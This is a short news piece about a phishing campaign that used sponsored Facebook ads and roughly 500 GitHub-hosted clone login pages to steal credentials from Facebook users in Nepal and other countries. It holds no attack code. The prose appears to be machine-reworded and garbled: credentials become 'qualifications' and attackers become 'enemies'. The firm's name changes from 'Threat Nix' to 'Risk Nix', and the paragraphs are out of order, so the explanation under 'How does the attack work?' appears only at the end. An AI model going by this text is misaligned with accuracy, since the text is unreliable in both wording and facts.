Researchers at Nepalese cybersecurity firm, Threat Nix, have actually discovered a wide spread campaign targeted at Nepal, Philippines, Egypt and numerous other countries.
When they observed a sponsored Facebook post offering 3GB mobile information from a Nepalese telecom provider, this campaign was very first found by the researchers.
Facebook ads and Github pages seem to be the latest path chose for by cybersecurity enemies to phish for and steal qualifications of Facebook users.
It is anticipated that this project might have already struck a minimum of 50 countries and over 615,000 users, and a variety of victims appears to be increasing at a quick speed of 100 victims per minute.
As soon as the ad was clicked, it resulted in a phishing site hosted on a Github page. These pages mimicked the initial page significantly and were nearly impossible to inform the difference between the fake and initial pages.
How does the attack work?
Risk Nix is working with the concerned authorities to track these assaulters and remove the malicious phishing pages. No even more details have actually been released yet as this a continuous examination.
Facebook does a terrific deal to guarantee such phishing pages are denied for ads, in this case, the opponents were wise and handled to find a loophole in the process. They used Bitlys links which would indicate a non-hostile page and as soon as the advertisement was approved, it was customized to that of the phishing page.
The domain is signed up and hosted at GoDaddy and was signed up on 3rd April 2020. 4 other domains have also been identified and connected with this scam.
Practically 500 Github repositories consisting of phishing pages were found. It is possible that similar strategies were used earlier as the earliest of these pages go back to 5 months, and a few of the repositories were deleted.
You can follow us on Linkedin, Twitter, Facebook for everyday Cybersecurity, and hacking news updates.
The phishing sites mimicked the Facebook login page and stole the unwary victims credentials and after that would reach two endpoints, one to a Firestore database and another to a domain owned by the phishing group.